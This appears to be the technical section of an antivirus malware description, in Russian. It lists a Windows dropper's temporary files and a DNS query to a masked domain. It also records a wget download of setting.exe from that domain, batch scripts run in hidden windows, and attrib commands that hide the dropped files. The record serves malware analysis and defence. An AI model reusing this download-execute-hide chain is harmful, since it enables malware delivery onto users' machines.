Техническая информация
- %TEMP%\get.cmd
- %TEMP%\wait.cmd
- %TEMP%\wget.exe
- nul
- %TEMP%\7zsfx000.cmd
- %TEMP%\wget.exe
- %TEMP%\get.cmd
- %TEMP%\wait.cmd
- %TEMP%\7zsfx000.cmd
- %TEMP%\wget.exe
- %TEMP%\wait.cmd
- %TEMP%\get.cmd
- DNS ASK al###trans.com
- '%TEMP%\wget.exe' http://al###trans.com//setting.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\get.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\wait.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\get.cmd" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\wait.cmd" "
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 4
- '<SYSTEM32>\attrib.exe' +s +h "wget.exe"
- '<SYSTEM32>\attrib.exe' +s +h "get.cmd"
- '<SYSTEM32>\attrib.exe' +s +h "wait.cmd"
- '<SYSTEM32>\ping.exe' 8.8.8.8 -n 5
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "
- '<SYSTEM32>\attrib.exe' -s -h "wget.exe"
- '<SYSTEM32>\attrib.exe' -s -h "get.cmd"
- '<SYSTEM32>\attrib.exe' -s -h "wait.cmd"